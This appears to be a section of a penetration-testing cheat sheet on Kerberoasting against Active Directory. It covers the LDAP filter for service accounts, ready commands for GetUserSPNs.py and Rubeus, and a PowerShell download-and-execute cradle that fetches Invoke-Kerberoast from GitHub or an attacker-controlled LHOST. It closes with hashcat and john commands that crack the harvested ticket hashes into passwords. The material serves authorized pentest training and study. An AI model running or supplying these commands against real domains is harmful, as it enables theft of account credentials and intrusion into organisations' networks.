3. Kerberoasting
- harvesting TGS for services running on behalf of user accounts
- TGS tickets to be cracked to retrieve user password
- requires domain account allowed to request TGS; typically any domain account since no special privileges required
- LDAP query to retrieve user accounts with associated services:
- (&(samAccountType=805306368)(servicePrincipalName=*))
- first parameter: request user accounts ONLY (no computer accounts)
- second parameter: filter by accounts with at least 1 service
- (&(samAccountType=805306368)(servicePrincipalName=*))
Tools: impacket’s GetUserSPNs.py (Linux), Rubeus (Windows)
Linux
GetUserSPNs.py DOMAIN/USERNAME:PASSWORD -dc-ip $IP -save -outputfile FILE
Windows
.\Rubeus.exe kerberoast /outfile:HASHFILE
Invoke-Kerberoast (Empire project)
Another way to accomplish Kerberoast is to use Invoke-Kerberoast from Empire project, which can be loaded directly into memory (provided that there’s internet; else download to local and load from there)
Load module from github
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Load module from local
iex (new-object Net.WebClient).DownloadString("http://LHOST/Invoke-Kerberoast.ps1")
Execute
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII HASHFILE
Cracking the AS_REP / hash
hashcat
hashcat -m 13100 HASHFILE WORDLIST
NOTE: Due to encoding while using hashcat, a problem may arise. The tool displays an error similar to Byte Order Mark (BOM) was detected, due to an input file encoded with Unicode (which is common in Windows output files) instead of ASCII. In order to solve this issue, the tool dos2unix can be used to convert the file encoding to the correct one.
john
john --format=krb5tgs --wordlist=WORDLIST HASHFILE